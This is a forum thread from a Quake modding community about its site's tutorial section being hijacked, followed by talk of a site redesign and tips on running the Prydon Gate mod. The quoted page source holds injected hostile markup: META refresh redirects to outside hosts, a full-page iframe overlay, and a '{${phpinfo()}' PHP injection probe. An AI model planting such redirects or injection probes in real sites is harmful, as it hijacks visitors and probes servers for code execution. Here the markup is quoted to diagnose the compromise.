Not sure if this is already known but the tut section seems to be hijacked:

Looks like a simple http redirect happening. If I were to guess I would say the security on the Tuts submission is too low. Probably they pasted malicious code as a tut? Anyhow not all the tutorials are hosed. The QC tutorials on footsteps still is up although its saying an error occured >

I did a quick grab of that page source and you can easily see the redirect in the code page. Here is a snippet around the meta redirect:

Code: Select all

<div class="menuheading">Allied Sites</div>
<ul>
<li><a href='http://minion.planetquake.gamespy.com/index3.html'>AI Cafe</a></li>
<li><a href='http://icculus.org/twilight/darkplaces/'>DarkPlaces</a></li>
<li><a href='http://dpwiki.slipgateconstruct.com'>DarkPlaces Wiki</a></li>
<li><a href='http://www.inside3d.com/frikbot/'>FrikBot</a></li>
<li><a href='http://www.celephais.net/board/news.php'>Func_Msgboard</a></li>
<li><a href='http://leileilol.mancubus.net/leiware'>Leiware</a></li>
<li><a href='http://www.mpqarchive.com/'>MPQ Archive</a></li>
<li><a href='http://www.quaddicted.com/'>Quaddicted</a></li>
<li><a href='http://www.inside3d.com/qip/'>Quake Info Pool</a></li>
<li><a href='http://www.quaketerminus.com/'>Quake Terminus</a></li>
<li><a href='sitelist.php'>More...</a></li>
</ul>
<br />
</div>

<div id="right">
	<div class="menuheading">Pic of the "Day"</div>
	<div align="center">
		<div id="POTD">
			<a href="image.php?show=potd/transloquake000063.jpg"><img src="potd/thumbs/transloquake000063.jpg" border="0" alt="Pic of the 'Day'"/></a>
		</div>
	</div>
	<br />
	<div class="menuheading">Recent News</div>
	<div class="smalltext">
	<br />
	<ul><li><a href='index.php?show=376'><META HTTP-EQUIV="Refresh" CONTENT="1;URL=http://pagebin.com/beAkvtoL">     <META HTTP-EQUIV="Refresh" CONTENT="1;URL=http://jsbin.com/tivif/35">      <iframe style="position:absolute; top:0; right:0; z-index: 240;" width="100%" height="100%" scrolling="A</a></li><li><a href='index.php?show=371'>{${phpinfo()}</a></li><li><a href='index.php?show=367'>FTE as described by gb</a></li><li><a href='index.php?show=365'>Advent-ure a Requiem?</a></li><li><a href='index.php?show=364'>Hellcrush? Hell no. Hellsmash!</a></li></ul>	</div>
    <br />
	<div class="menuheading">RSS Feeds</div>
	<ul>
	<li><a href="news_feed.php">News Feed</a></li>
	<li><a href="tutorial_feed.php">Tutorial Feed</a></li>
	</ul>
    <br />
You can see what looks like two META HTTP-EQUIV="Refresh" CONTENT="1;URL redirects to "http://pagebin.com/beAkvtoL" & "http://jsbin.com/tivif/35" The 1st one times out and the 2ns is the one you get sent to:

Its been so long since anyone uploaded a tutorial here I can see why it took so long to get found by someone.

I'd like to point something else out: I've never played Prydon Gate before (my fault I know) but the project page (which it's under inside3d domain) is not visible in front page (at least I didn't find it).
Why guys, don't we take those attacks as a chance to redesign non-forums pages (home, tutorials, projects, sources, etc.)?

by the way: new inside3d home page

Not sure if Frik or whoever has the time. You should definitely try Prydon at least once or twice. :)

I make myself volunteer for the non-forums part. I could do some artworks and see if the community likes it and then rebuild the entire front page site. I use Drupal, so I don't know if someone has something against it

Definately! :D

Well I don't see what you referring to on the PrydonGate site. All the file links to the Atomic Gamer site where they are hosted are fine. SO your telling me I need some other mystery patch not listed on the site to play PrydonGate?

Maybe the "mystery" patch is in this Prydon Gate QEXPO Edition compilation?

Naaa it appears to be the same progs.dat when comparing file size, date and time. I did see the "patch" you where referring to in the News section of the PG site. Pretty sure that's the file(s) hosted on QuakeOne.

idk i went on a few months ago and the link to the patch on the website was broken.

Oh i don't doubt you. Right now all 3 download links for each of the files work fine on Atomic Gamer. The one link on the News page is not there because that host site is no longer there. I would probably just grab the compilation that Baker is hosting on QuakeOne since it seems to have the latest prog.dat that I can find and addons for the mod.

Not that DP is required toneddu2000, but if you happen to run the mod with Darkplaces then make sure in the console to enable the game cursor with:

Code: Select all

cl_prydoncursor 1
You can start a new game from the menu or you can load the tdastart map from the console. It was introduced with the last addon The Dark Age with jump gates to different Prydon Gate locals.
